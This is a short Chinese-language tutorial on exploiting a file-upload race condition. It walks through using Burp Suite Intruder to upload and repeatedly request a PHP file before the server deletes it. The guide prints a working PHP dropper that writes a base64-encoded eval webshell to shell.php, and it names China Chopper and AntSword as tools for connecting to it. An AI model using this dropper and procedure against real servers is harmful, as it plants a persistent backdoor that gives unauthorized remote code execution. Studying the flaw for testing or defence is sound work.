文件上传之条件竞争

文件上传之条件竞争

原理：先保存文件

　　　　查看文件是否符合条件

　　　　　　满足（保留文件并重命名）

　　　　　　不满足（删除文件）

我们上传文件要在保存文件后在他被删除之前访问到他，所以访问速度一定要快，使用burpsuite的intruder功能来重复访问和发送。

第一步、正常上传，查看文件保存目录

第二步、抓包，抓取上传木马的包，发送到intruder，重复发包。

木马要能生小马，这样我们访问木马(a.php)，木马就会生下小马(shell.php)，木马会被删除但是小马会被留下。

1 //PHP大马生小马
2 <?php
3 $a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+';
4 $myfile = fopen("shell.php", "w");
5 fwrite($myfile, base64_decode($a));
6 fclose($myfile);
7 ?>

第三步、再去抓取访问木马(a.php)的包，发送到intruder

第四步、重复发送和访问，知道木马生成小马（访问状态200）

打开intruder，攻击类型选择Sniper，清除符号（我这个是汉化版的，英文版的跟这对应）

另一个也是如此

第五步、开始重复访问，开始重复发送，先开始访问，再开始发送

发现有200状态，说明木马已经生成小马

第六步、进行连接用中国菜刀或者中国蚁剑都可以